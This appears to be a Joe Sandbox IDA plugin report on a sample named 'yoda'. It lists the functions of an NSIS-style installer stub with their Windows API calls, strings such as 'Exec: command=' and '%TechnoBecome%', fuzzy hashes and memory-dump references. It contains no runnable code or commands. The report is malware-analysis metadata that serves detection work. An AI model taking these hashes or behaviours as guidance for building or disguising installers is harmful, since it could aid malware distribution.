Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32 ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32 ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427176,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427176,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427176,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

`G, xrefs: 0040246E
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: Could not load %s, xrefs: 004024DB
Error registering DLL: %s not found in %s, xrefs: 0040249A

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32 ref: 00403E67
DeleteObject.GDI32 ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427176,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427176,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427176,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNEL32 ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: success ("%s"), xrefs: 00402263
Exec: command="%s", xrefs: 00402241
Exec: failed createprocess ("%s"), xrefs: 004022C2

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32 ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32 ref: 0040326A
MulDiv.KERNEL32(0000F200,00000064,000D0618), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNEL32 ref: 00402387

Strings

%TechnoBecome%, xrefs: 00401EFB, 00401F00, 00401F1A
Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: %TechnoBecome%$Exch: stack < %d elements$Pop: stack empty
API String ID: 1459762280-1480458765
Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32 ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32 ref: 00401547

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNEL32 ref: 00402387

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32 ref: 004020EE

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
